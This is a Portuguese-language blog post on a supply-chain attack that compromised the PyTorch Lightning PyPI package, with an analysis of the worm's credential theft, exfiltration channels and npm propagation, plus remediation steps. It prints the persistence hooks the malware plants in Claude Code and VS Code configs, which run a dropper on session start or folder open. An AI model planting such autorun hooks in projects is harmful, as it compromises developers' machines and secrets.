8 Milhões de Downloads Infectados: O Malware ‘Dune’ Dentro do PyTorch Lightning

O Worm com Nome de Dune

Se você fez pip install lightning nas últimas horas, pare o que está fazendo e leia isto.

As versões 2.6.2 e 2.6.3 do pacote lightning no PyPI — o framework PyTorch Lightning usado para treinar modelos de IA — foram comprometidas com um malware sofisticado que rouba credenciais, infecta repositórios GitHub e se propaga como um worm digital. O nome? Mini Shai-Hulud, uma referência ao verme de areia gigante de Dune.

E a parte mais assustadora: basta um import lightning no seu código para que o ataque comece. Sem interação, sem permissão, sem nenhum sinal visível.

Como o Ataque Funciona (Passo a Passo)

O vetor de entrada é engenhosamente simples. Quando você importa o pacote lightning, o __init__.py modificado dispara uma thread daemon que executa um script chamado start.py escondido dentro de um diretório _runtime. Até aqui, nada aparece no terminal.

Esse start.py é um bootstrapper multiplataforma que:

Detecta seu sistema operacional e arquitetura
Baixa o runtime JavaScript Bun (versão 1.3.13)
Executa um payload de 11 MB chamado router_runtime.js

Sim, 11 megabytes de JavaScript ofuscado rodando silenciosamente na sua máquina.

O que o payload faz

A lista de alvos é absurda. O router_runtime.js vasculha sua máquina em busca de:

Categoria	O que é roubado
—————-
Tokens, credenciais, configuração SSH
AWS (IMDSv2, Secrets Manager, SSM), Azure (Key Vault, DefaultAzureCredential), GCP (Secret Manager)
GitHub Actions secrets via `${{ toJSON(secrets) }}`
Kubernetes configs, Helm values, Docker credentials
Histórico do bash, zsh, Python, Node, MySQL, psql
NordVPN, ProtonVPN, CyberGhost, Windscribe, OpenVPN
Carteiras de Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic, Ledger
Sessões do Discord e Slack
`.env`, chaves SSH, `.npmrc`

Eu já vi supply chain attacks antes, mas esse nível de cobertura é raro. O atacante não estava mirando um tipo específico de credencial — estava aspirando tudo.

A exfiltração é criativa (e perturbadora)

Os dados roubados são criptografados com RSA-2048 antes de saírem da sua máquina. Mas o método de exfiltração é o que realmente diferencia esse ataque. São quatro canais simultâneos:

HTTPS POST para um servidor de comando e controle
GitHub Commit Search API com tokens encodados em base64
Repositórios públicos criados na conta da vítima com a descrição “A Mini Shai-Hulud has Appeared”
Push direto em até 50 branches de cada repositório acessível

Leu direito: o malware usa seus próprios tokens GitHub para criar repositórios públicos na sua conta com os dados roubados. Se você vir um repo novo com a descrição “A Mini Shai-Hulud has Appeared”, suas credenciais já foram.

O Componente Worm: Como Ele Se Propaga

Aqui é onde a coisa fica realmente séria. O Shai-Hulud não se contenta em roubar — ele se reproduz.

Quando encontra tokens npm válidos na máquina infectada, o malware:

Busca pacotes npm que o desenvolvedor tem permissão de publicar
Modifica o package.json adicionando hooks de postinstall
Incrementa a versão patch do pacote
Reempacota e publica a versão contaminada no npm

Isso significa que se um mantenedor de pacote npm popular for infectado via PyTorch Lightning, seus usuários também serão comprometidos na próxima vez que rodarem npm install. É um worm cross-ecosystem — começa no PyPI, salta para o npm.

Persistência no ambiente do desenvolvedor

Além de roubar e se propagar, o malware planta hooks de persistência em duas ferramentas populares:

Claude Code:


// .claude/settings.json
{
  "hooks": {
    "SessionStart": "bun run .claude/setup.mjs"
  }
}

VS Code:


// .vscode/tasks.json
{
  "tasks": [{
    "label": "setup",
    "type": "shell",
    "command": "bun run .vscode/setup.mjs",
    "runOptions": { "runOn": "folderOpen" }
  }]
}

Toda vez que você abre o VS Code ou inicia uma sessão do Claude Code, o dropper roda de novo. E os commits maliciosos feitos em repositórios são falsamente atribuídos ao “Claude Code” da Anthropic — uma forma de camuflar a atividade como ação legítima de uma ferramenta de IA.

Terceira Onda de uma Campanha Maior

O ataque ao PyTorch Lightning não é um incidente isolado. É a terceira onda de uma campanha chamada Shai-Hulud, com referências ao universo de Dune em cada iteração:

Alvo Data —— —— Bitwarden CLI (npm) Março 2026 Pacotes SAP npm (@cap-js/db-service, @cap-js/postgres, @cap-js/sqlite, mbt) 29 de abril 2026 PyTorch Lightning 30 de abril 2026

O playbook evoluiu a cada iteração. Na campanha do Bitwarden, o atacante estabeleceu a estratégia base: infectar máquina de desenvolvedor, roubar credenciais CI/CD, extrair token de publicação, publicar versão comprometida do pacote. Nas ondas seguintes, adicionou propagação npm automática e persistência em IDEs.

A campanha contra pacotes SAP, revelada apenas um dia antes do ataque ao PyTorch Lightning, comprometeu quatro pacotes npm usados no SAP Cloud Application Programming Model. As versões afetadas: mbt 1.2.48, @cap-js/db-service 2.10.1, @cap-js/postgres 2.2.2 e @cap-js/sqlite 2.2.2.

O grupo por trás dos ataques é rastreado como TeamPCP.

A Resposta Foi Rápida (Mas Suficiente?)

A Socket detectou as builds maliciosas 18 minutos após a publicação no PyPI. É um tempo de resposta impressionante, mas em supply chain attacks, minutos já são suficientes para causar dano. O pacote lightning tem centenas de milhares de downloads diários — segundo a OX Security, mais de 8,3 milhões de downloads estão potencialmente comprometidos considerando o alcance do pacote.

O PyPI colocou o pacote em quarentena rapidamente. A versão 2.6.1 é a última limpa confirmada.

Múltiplas empresas de segurança publicaram análises quase simultaneamente:

Aikido Security identificou a conexão com a campanha Shai-Hulud anterior
OX Security mapeou os 8,3 milhões de downloads comprometidos
Socket flagou em 18 minutos
StepSecurity analisou o vetor de persistência em CI/CD
Semgrep publicou a análise técnica mais detalhada

O Que Fazer Agora (Checklist de Remediação)

Se você usa PyTorch Lightning em qualquer projeto, siga esses passos imediatamente:

1. Verifique sua versão instalada


pip show lightning | grep Version

Se retornar 2.6.2 ou 2.6.3, você foi afetado.

2. Faça downgrade para a versão segura


pip install lightning==2.6.1

3. Procure indicadores de comprometimento


# Arquivos plantados pelo malware
find . -path "*/.claude/router_runtime.js" -o \
       -path "*/.claude/setup.mjs" -o \
       -path "*/.vscode/setup.mjs" 2>/dev/null

# Commits suspeitos
git log --all --oneline | grep "EveryBoiWeBuildIsAWormyBoi"

# Repos criados pelo malware na sua conta GitHub
gh repo list --json name,description | \
  jq '.[] | select(.description | contains("Shai-Hulud"))'

4. Rotacione TODAS as credenciais

Não é exagero. Se você foi infectado, rotacione:

Tokens GitHub (pessoais e de GitHub Actions)
Credenciais AWS, Azure e GCP
Tokens npm
Chaves SSH
Qualquer API key em arquivos .env
Senhas de VPN
Verifique carteiras de criptomoedas

5. Verifique hashes dos arquivos maliciosos


router_runtime.js: 5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1
start.py: 8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2

A Anatomia do Payload: 11 MB de JavaScript Ofuscado

Vale a pena mergulhar um pouco mais no router_runtime.js, porque ele revela o nível de profissionalismo do atacante.

O arquivo de 11 MB não é código amador jogado às pressas. É um bundle Bun altamente ofuscado que implementa:

Detecção de ambiente: Antes de agir, o malware identifica se está rodando em uma máquina de desenvolvedor local, num container Docker, ou num runner de CI/CD. Cada ambiente recebe um tratamento diferente. Num runner de GitHub Actions, por exemplo, ele prioriza a extração de secrets do workflow. Numa máquina local, ele vai atrás de SSH keys e carteiras de criptomoedas.

Validação de tokens: Os tokens GitHub roubados não são simplesmente exfiltrados — são validados em tempo real contra api.github.com/user. Tokens inválidos ou expirados são descartados. Isso mostra que o atacante quer qualidade, não quantidade bruta de dados.

Rate limiting inteligente: Para evitar detecção por ferramentas de monitoramento de rede, as requisições de exfiltração são espaçadas e randomizadas. O malware não dispara 50 requests de uma vez — ele goteja os dados ao longo de minutos.

Criptografia seletiva: Dados menores (tokens, API keys) são exfiltrados via GitHub Commit Search API com encoding base64. Dados maiores (histórico de shell, arquivos .env completos) são criptografados com RSA-2048 e enviados via HTTPS POST. O atacante otimizou a exfiltração por tamanho de payload.

Esse nível de engenharia não é obra de um script kiddie. É um grupo organizado com experiência em operações de supply chain.

Por Que Pacotes de IA São Alvos Perfeitos

Não é coincidência que o atacante escolheu o PyTorch Lightning. Pacotes de machine learning são alvos particularmente lucrativos por três razões:

Volume de credenciais cloud: Quem treina modelos geralmente tem acesso a instâncias GPU caras na AWS, GCP ou Azure. Os tokens de acesso a esses serviços valem ouro no mercado negro.

Ambientes CI/CD ricos: Pipelines de treinamento de ML frequentemente rodam em GitHub Actions ou equivalentes, com secrets que incluem tokens de registries privados, credenciais de storage (S3 buckets com datasets) e chaves de APIs pagas.

Cultura de “instala e roda”: A comunidade de ML tem o hábito de copiar comandos pip install de tutoriais e notebooks sem verificar versões. Quantas vezes você já rodou pip install lightning sem especificar uma versão fixa?

Esse último ponto é crucial. A diferença entre pip install lightning e pip install lightning==2.6.1 é literalmente a diferença entre uma máquina limpa e uma comprometida.

Lições Para Todo Desenvolvedor

Eu sei que parece alarmista, mas estamos numa nova era de supply chain attacks. Três ondas em menos de dois meses, cada uma mais sofisticada que a anterior. O que isso significa na prática?

Pin suas dependências. Sempre. Use pip install package==versão, não pip install package. Isso vale para npm, pip, cargo, go — qualquer gerenciador de pacotes. Se você está usando requirements.txt, garanta que tem versões fixas. Se está usando poetry.lock ou pip-tools, mantenha os lockfiles atualizados.

Monitore com ferramentas de supply chain security. Socket, Aikido, Semgrep, Snyk — existem opções. A detecção em 18 minutos da Socket pode ter salvado milhares de desenvolvedores. Mas quem não tinha monitoramento instalou a versão maliciosa sem saber.

Audite seus repositórios. Procure arquivos em .claude/ e .vscode/ que você não criou. Verifique se existem hooks de postinstall inesperados em package.json. Revise commits recentes feitos por “Claude Code” que você não autorizou.

Assuma que vai acontecer de novo. O TeamPCP está ativo e evoluindo. A cada onda, o ataque fica mais sofisticado. Se o padrão continuar, o próximo alvo pode ser qualquer pacote popular no ecossistema que você usa.

Revise permissões de tokens npm e PyPI. Se você é mantenedor de pacotes, use tokens com escopo limitado (read-only onde possível) e habilite 2FA obrigatório para publicação. O Shai-Hulud explorou especificamente tokens de publish com escopo amplo.

Isole ambientes de desenvolvimento. Containers, VMs, ou ao menos ambientes virtuais Python separados por projeto. Se o malware rodar dentro de um container efêmero sem acesso às suas credenciais reais, o dano é contido. Ferramentas como Dev Containers no VS Code ou GitHub Codespaces existem exatamente para isso.

O Ecossistema Python Precisa de Lockfiles de Verdade

Essa discussão é inevitável. O npm tem o package-lock.json. O Cargo tem o Cargo.lock. O Go tem o go.sum. E o Python?

O requirements.txt tradicional é um arquivo de texto sem verificação de integridade. Mesmo que você fixe versões (lightning==2.6.1), não há hash verificado por padrão. Um atacante que compromete o PyPI pode substituir o conteúdo de uma versão existente (embora o PyPI tenha proteções contra isso hoje).

O pip suporta hash checking com --require-hashes, mas quase ninguém usa:


lightning==2.6.1 \
    --hash=sha256:abc123...

Ferramentas como pip-compile (do pip-tools) e poetry.lock ajudam, mas a adoção é desigual. Na comunidade de ML em particular, a cultura de Jupyter Notebooks e pip install direto no terminal domina. Lockfiles? Verificação de hashes? São conceitos que muitos data scientists nunca ouviram falar.

Enquanto o ecossistema Python não resolver isso de forma unificada — um lockfile padrão com hashes verificados e adoção massiva — ataques como o Shai-Hulud vão continuar encontrando terreno fértil.

O Shai-Hulud de Dune era um monstro que se movia debaixo da areia, invisível até o momento do ataque. O nome foi escolhido a dedo.

Fontes: Semgrep · The Hacker News · Aikido Security · Socket

Shopping cart

Recent Posts

Project Valhalla no JDK 28:

59% dos Tokens da Sua

US$ 920 Milhões por Mês: